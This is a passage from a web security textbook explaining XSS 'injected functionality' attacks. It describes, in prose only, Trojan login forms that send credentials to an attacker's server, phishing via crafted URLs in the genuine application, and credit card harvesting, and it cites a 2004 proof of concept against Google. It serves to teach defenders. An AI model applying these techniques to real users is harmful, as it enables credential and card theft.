The Web Application Hacker’s Handbook Discovering and Exploiting Security Flaws

This attack goes beyond virtual defacement and injects actual working func-

tionality into the vulnerable application, designed to deceive end users into

performing some undesirable action, such as entering sensitive data that is

then transmitted to the attacker.

An obvious attack involving injected functionality is to present users with a

Trojan login form that submits their credentials to a server controlled by the

attacker. If skillfully executed, the attack may also seamlessly log the user in to

the real application, so that they do not detect any anomaly in their experience.

The attacker is then free to use the victim’s credentials for his own purposes.

This type of payload lends itself well to a phishing-style attack, in which users

are fed a crafted URL within the actual authentic application and advised that

they will need to log in as normal to access it.

Another obvious attack is to ask users to enter their credit card details, usu-

ally with the inducement of some attractive offer. For example, Figure 12-8

shows a proof-of-concept attack created by Jim Ley, exploiting a reflected XSS

vulnerability found in Google in 2004.